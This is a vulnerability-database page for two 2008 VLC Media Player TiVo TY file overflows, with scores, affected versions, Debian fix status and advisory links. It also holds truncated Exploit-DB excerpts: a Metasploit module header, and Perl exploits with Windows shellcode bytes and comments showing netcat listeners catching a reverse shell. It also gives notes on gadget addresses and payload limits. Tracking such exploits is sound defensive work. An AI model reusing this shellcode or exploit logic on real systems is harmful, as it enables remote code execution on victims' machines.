CVE-2008-4654
published 2008-10-22CVE-2008-4654: Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote…
PriorityP262critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
57.55%
99.0th percentile
Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote attackers to execute arbitrary code via a TiVo TY media file with a header containing a crafted size value.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 0.8.6.h-4.1 (bookworm) | vlc 0.8.6.h-4.1 (bookworm) |
| debian | vlc | < vlc 1.0.3-1 (bookworm) | vlc 1.0.3-1 (bookworm) |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 1.0.3-1 | 1.0.3-1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 1.0.3-1 | 1.0.3-1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 1.0.3-1 | 1.0.3-1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 1.0.3-1 | 1.0.3-1 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xF5\x46\x7A\xBD
bytes↗
\xF5\x46\x7A\xBD\x00\x00\x00\x02\x00\x02\x00\x00
bytes↗
\x24\x11\x62\x77
bytes↗
\xb3\x57\x04\x7d
bytes↗
\x13\x12\x54\x6a
- ·The jmp-esp ROP gadget addresses (0x6a575cad for VLC 0.9.4, 0x65473351 for VLC 0.9.2) are specific to XP SP3 English builds of libvlc; these addresses will differ on other OS/SP/language combinations and the exploit will fail or crash VLC instead. ↗
- ·The Metasploit payload space is constrained to 550 bytes with null bytes as bad characters; payloads exceeding this space or containing \x00 will not function correctly. ↗
- ·The exploit works both with a local file and with a remote URL delivered to VLC, broadening the attack surface beyond just local file open scenarios. ↗
- ·CVE-2008-4686 (integer overflows in the same ty.c file) is a distinct but related vulnerability; patching CVE-2008-4654 alone (fixed in VLC 1.0.3-1 on Debian) does not address CVE-2008-4686. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv9.3CRITICAL
vendor_debian9.3LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2p9m-qq44-x2r6: Multiple integer overflows in ty
ghsa_unreviewed·2022-05-17·CVSS 9.3
CVE-2008-4686 [CRITICAL] GHSA-2p9m-qq44-x2r6: Multiple integer overflows in ty
Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to execute arbitrary code via a crafted .ty file, a different vulnerability than CVE-2008-4654.
GHSA
GHSA-wrh9-pxv5-hf6w: Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty
ghsa_unreviewed·2022-05-14
CVE-2008-4654 [HIGH] CWE-119 GHSA-wrh9-pxv5-hf6w: Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty
Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote attackers to execute arbitrary code via a TiVo TY media file with a header containing a crafted size value.
OSV
CVE-2008-4686: Multiple integer overflows in ty
osv·2008-10-22·CVSS 9.3
CVE-2008-4686 [CRITICAL] CVE-2008-4686: Multiple integer overflows in ty
Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to execute arbitrary code via a crafted .ty file, a different vulnerability than CVE-2008-4654.
OSV
CVE-2008-4654: Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty
osv·2008-10-22·CVSS 9.3
CVE-2008-4654 [CRITICAL] CVE-2008-4654: Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty
Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote attackers to execute arbitrary code via a TiVo TY media file with a header containing a crafted size value.
Debian
CVE-2008-4686: vlc - Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer)...
vendor_debian·2008·CVSS 9.3
CVE-2008-4686 [CRITICAL] CVE-2008-4686: vlc - Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer)...
Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to execute arbitrary code via a crafted .ty file, a different vulnerability than CVE-2008-4654.
Scope: local
bookworm: resolved (fixed in 0.8.6.h-4.1)
bullseye: resolved (fixed in 0.8.6.h-4.1)
forky: resolved (fixed in 0.8.6.h-4.1)
sid: resolved (fixed in 0.8.6.h-4.1)
trixie: resolved (fixed in 0.8.6.h-4.1)
Debian
CVE-2008-4654: vlc - Stack-based buffer overflow in the parse_master function in the Ty demux plugin ...
vendor_debian·2008·CVSS 9.3
CVE-2008-4654 [CRITICAL] CVE-2008-4654: vlc - Stack-based buffer overflow in the parse_master function in the Ty demux plugin ...
Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote attackers to execute arbitrary code via a TiVo TY media file with a header containing a crafted size value.
Scope: local
bookworm: resolved (fixed in 1.0.3-1)
bullseye: resolved (fixed in 1.0.3-1)
forky: resolved (fixed in 1.0.3-1)
sid: resolved (fixed in 1.0.3-1)
trixie: resolved (fixed in 1.0.3-1)
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)
exploitdb·2011-02-02
CVE-2008-4654 VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)
---
##
# $Id: videolan_tivo.rb 11701 2011-02-02 21:47:02Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'VideoLAN VLC TiVo Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in VideoLAN VLC 0.9.4.
By creating a malicious TY file, a remote attacker could overflow a
buffer and execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => 'MC',
'Version' => '$Revision: 11701 $',
'References' =>
[
[ 'CVE', '2008-4654' ],
[ 'OSVDB', '49181'
Exploit-DB
VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
exploitdb·2008-10-23
CVE-2008-4686 VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# 10/23/2008 k`sOSe
# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit
# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k)
# 2 - Works both with a local file and with a remote url
# 3 - VLC do not crash!
# 4 - Enjoy a respawing shell, even if VLC will be closed!
#
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft C
Exploit-DB
VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow
exploitdb·2008-10-21
CVE-2008-4686 VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow
VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow
---
#!/usr/bin/perl
# 10/21/2008 k`sOSe
use warnings;
use strict;
# windows/exec - 141 bytes
# http://www.metasploit.com
my $shellcode =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
"\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73" .
"\x74\x65\x6d\x33\x32\x5c\x63\x61\x6c\x63\
Metasploit
VideoLAN VLC TiVo Buffer Overflow
metasploit
VideoLAN VLC TiVo Buffer Overflow
VideoLAN VLC TiVo Buffer Overflow
This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By creating a malicious TY file, a remote attacker could overflow a buffer and execute arbitrary code.
No writeups or analysis indexed.
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=502726http://git.videolan.org/?p=vlc.git%3Ba=commit%3Bh=fde9e1cc1fe1ec9635169fa071e42b3aa6436033http://git.videolan.org/?p=vlc.git%3Ba=commitdiff%3Bh=26d92b87bba99b5ea2e17b7eaa39c462d65e9133http://secunia.com/advisories/32339http://securityreason.com/securityalert/4460http://www.openwall.com/lists/oss-security/2008/10/19/2http://www.securityfocus.com/archive/1/497587/100/0/threadedhttp://www.securityfocus.com/bid/31813http://www.trapkit.de/advisories/TKADV2008-010.txthttp://www.videolan.org/security/sa0809.htmlhttp://www.vupen.com/english/advisories/2008/2856https://exchange.xforce.ibmcloud.com/vulnerabilities/45960https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14803http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=502726http://git.videolan.org/?p=vlc.git%3Ba=commit%3Bh=fde9e1cc1fe1ec9635169fa071e42b3aa6436033http://git.videolan.org/?p=vlc.git%3Ba=commitdiff%3Bh=26d92b87bba99b5ea2e17b7eaa39c462d65e9133http://secunia.com/advisories/32339http://securityreason.com/securityalert/4460http://www.openwall.com/lists/oss-security/2008/10/19/2http://www.securityfocus.com/archive/1/497587/100/0/threadedhttp://www.securityfocus.com/bid/31813http://www.trapkit.de/advisories/TKADV2008-010.txthttp://www.videolan.org/security/sa0809.htmlhttp://www.vupen.com/english/advisories/2008/2856https://exchange.xforce.ibmcloud.com/vulnerabilities/45960https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14803
2008-10-22
Published